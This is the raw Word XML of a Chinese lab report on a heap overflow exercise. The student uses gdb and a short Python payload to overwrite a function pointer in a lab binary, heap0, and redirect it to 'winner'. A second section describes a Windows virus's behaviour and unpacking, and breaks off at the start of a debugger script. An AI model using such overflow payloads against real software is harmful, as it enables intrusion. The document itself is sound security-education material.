    <w:p w14:paraId="073A739A" w14:textId="5AF064B9" w:rsidR="00FF7614" w:rsidRDefault="00FF7614" w:rsidP="00A05C0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F761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354F7C1" wp14:editId="1F365EC8">
            <wp:extent cx="5274310" cy="17735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64EB" w14:textId="77777777" w:rsidR="00140962" w:rsidRPr="00140962" w:rsidRDefault="00140962" w:rsidP="0014096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140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为了简化控制台输入，我们使用python自动生成输入流，编辑python脚本h2，该脚本生成80个字符'A'以及字符串'BCDE'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD8D5F" w14:textId="77777777" w:rsidR="00140962" w:rsidRPr="00140962" w:rsidRDefault="00140962" w:rsidP="0014096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gramStart"/>
      <w:r w:rsidRPr="00140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B5550B" w14:textId="77777777" w:rsidR="00140962" w:rsidRPr="00140962" w:rsidRDefault="00140962" w:rsidP="0014096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140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>print 'A'*80 + 'BCDE'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028C778B" w14:textId="77777777" w:rsidR="00140962" w:rsidRPr="00140962" w:rsidRDefault="00140962" w:rsidP="0014096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140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>将脚本的输出输入到脆弱性C程序，并用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>调试器查看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D2BC60" w14:textId="77777777" w:rsidR="00140962" w:rsidRPr="00140962" w:rsidRDefault="00140962" w:rsidP="0014096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140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140962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140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a+x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> h2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C91A782" w14:textId="77777777" w:rsidR="00140962" w:rsidRPr="00140962" w:rsidRDefault="00140962" w:rsidP="0014096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140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>q .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/heap0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD42801" w14:textId="77777777" w:rsidR="00140962" w:rsidRPr="00140962" w:rsidRDefault="00140962" w:rsidP="0014096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140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>h2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280F78EB" w14:textId="77777777" w:rsidR="00140962" w:rsidRPr="00140962" w:rsidRDefault="00140962" w:rsidP="0014096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140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749E9EF1" w14:textId="728B315A" w:rsidR="00140962" w:rsidRDefault="00140962" w:rsidP="00140962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r w:rsidRPr="00140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以看出'BCDE'正好把f的成员函数</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140962">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>覆盖了 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F14759" w14:textId="2413C046" w:rsidR="00FC2AA6" w:rsidRPr="00140962" w:rsidRDefault="00FC2AA6" w:rsidP="0014096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C2AA6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24C3FBFF" wp14:editId="2035D6B8">
            <wp:extent cx="5274310" cy="29489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8C91" w14:textId="4A80FF05" w:rsidR="00140962" w:rsidRDefault="00140962" w:rsidP="00A05C0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38EB914D" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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D5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>从步骤6的实验结果可以看出，连续输入80个字符之后，再输入就开始覆盖f的成员函数</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>了。就此推导如果我们把步骤6的字符串换成跳转的函数地址，就可以达到改变函数执行流的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403200ED" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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D5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>首先，使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>获取跳转目的地二进制地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595A68A6" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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D5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cp h2 h3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6D9F5D" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5422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D5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a+x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> h3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1487A4AE" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>q .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/heap0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C55E49" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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D5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>h3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BEDD67" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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D5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D408BD1" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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D5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>disassemble winner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20408AC6" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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D5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x00000000004005f6 &lt;+0&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67188A18" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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D5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>修改python脚本，最后的字符串是跳转目的地的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3376B574" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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gramStart"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1BEAD8" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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D5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>print 'A'*80 + '\xf6\x05\x40'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060D5A28" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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D5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>执行攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49486368" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00CD542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gramStart"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD5422">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>heap0 $(./h3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791A736E" w14:textId="598D6F1B" w:rsidR="00CD5422" w:rsidRPr="00CD5422" w:rsidRDefault="004E18EB" w:rsidP="00CD542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4E18EB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21EC4217" wp14:editId="17E63897">
            <wp:extent cx="5274310" cy="32613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C0E0" w14:textId="65E84CEE" w:rsidR="00CD5422" w:rsidRDefault="00CD5422" w:rsidP="00A05C0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1BDC3415" w14:textId="77777777" w:rsidR="00CD5422" w:rsidRPr="00720076" w:rsidRDefault="00CD5422" w:rsidP="00A05C0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3147B377" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>实验数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BCACDB" w14:textId="6EA897EF" w:rsidR="00A048C5" w:rsidRPr="00B91828" w:rsidRDefault="00B91828" w:rsidP="00A048C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B91828">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>见上图。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F40121F" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>实验数据处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4803EA74" w14:textId="21262506" w:rsidR="00A048C5" w:rsidRPr="00B91828" w:rsidRDefault="00B91828" w:rsidP="00A048C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91828">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>无。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59465103" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRDefault="00A048C5" w:rsidP="00A048C5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实验结果与分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBF6DEF" w14:textId="2C5CEA5E" w:rsidR="004F460F" w:rsidRDefault="00A16628" w:rsidP="00A1662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16628">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EB95ED2" wp14:editId="4D2C0231">
            <wp:extent cx="5274310" cy="2987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E674" w14:textId="5BD1863B" w:rsidR="00A16628" w:rsidRDefault="00A16628" w:rsidP="00A1662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不知为什么按实验步骤全部完成只有九十分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10177EBF" w14:textId="70661BC8" w:rsidR="00495E99" w:rsidRDefault="00495E99" w:rsidP="00A1662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1844C2EB" w14:textId="77777777" w:rsidR="00495E99" w:rsidRDefault="00495E99" w:rsidP="00A1662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</w:p>
    <w:p w14:paraId="68947103" w14:textId="7D391425" w:rsidR="00223256" w:rsidRDefault="00333F90" w:rsidP="00A1662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课外学习：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C6BF76" w14:textId="6C3D2CC0" w:rsidR="00333F90" w:rsidRPr="00A16628" w:rsidRDefault="00333F90" w:rsidP="00A1662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333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>最近看到一个有意思的病毒，它可以让Windows 10系统发生堆溢出，进而注入shellcode，接下来给大家分享、分享，如有分析不对之处，还请赐教！</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>样本信息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7C2ACBB2" wp14:editId="63B32FC9">
            <wp:extent cx="5274310" cy="1999615"/>
            <wp:effectExtent l="0" t="0" r="254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  <w:t>从下图可以看出该病毒是PE文件，控制端程序，程序入口处、程序大小等信息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10D56C8B" wp14:editId="62A2DC02">
            <wp:extent cx="5274310" cy="366585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  <w:t>病毒运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>运行环境是：Windows 10 x64</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>1.病毒运行时，弹出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cmd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窗口，这时插入U盘，U盘会有病毒的可执行文件和启动文件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66B1D428" wp14:editId="73C40FE1">
            <wp:extent cx="5274310" cy="196405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4F24DD32" wp14:editId="75885B6B">
            <wp:extent cx="5274310" cy="2222500"/>
            <wp:effectExtent l="0" t="0" r="254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  <w:t>2.关掉病毒时，运行U盘中的病毒时，系统盘产生了病毒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544698C3" wp14:editId="51235E87">
            <wp:extent cx="5274310" cy="165925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  <w:t>3.注册表添加了键值，从这个键值可以看出，当U盘带有该病毒时，会自启动该病毒。桌面上的doc、docx文件全部删除并生成了几个exe文件，运行exe文件，发现无法运行，用编辑</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.huaci.cc/" \t "_blank" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>打开发现里面是exe文件所在路径，桌面上的txt文件被篡改，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335F4343" wp14:editId="2360C8B7">
            <wp:extent cx="5274310" cy="215963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68A433AF" wp14:editId="0CE121A2">
            <wp:extent cx="1181100" cy="282702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7E5FB250" wp14:editId="58426ADC">
            <wp:extent cx="5274310" cy="118491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38489CED" wp14:editId="5260BBF8">
            <wp:extent cx="5274310" cy="99885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54B8FF4C" wp14:editId="62A4F217">
            <wp:extent cx="5274310" cy="367728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  <w:t>4.安全软件和调式软件全部关闭，任务管理，注册表软件等也会关闭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5826E039" wp14:editId="42D9169A">
            <wp:extent cx="5274310" cy="478599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  <w:t>脱壳和算法简单识别</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>1.查壳，发现是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AsPack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壳，接下来进行脱壳，脱壳的时候，一拖入OD病毒就跑了起来，那么用其它的方法，好像不行，接下来使用脱壳机进行脱壳。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6674CDD6" wp14:editId="6C2215E6">
            <wp:extent cx="4991100" cy="244602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2A09707F" wp14:editId="3F9D9C4C">
            <wp:extent cx="4663440" cy="3505200"/>
            <wp:effectExtent l="0" t="0" r="381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  <w:t>2.接着单步，使用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esp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定律，单步到程序EP，下面是运行到程序EP脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>var address   //定义变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00333F90">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
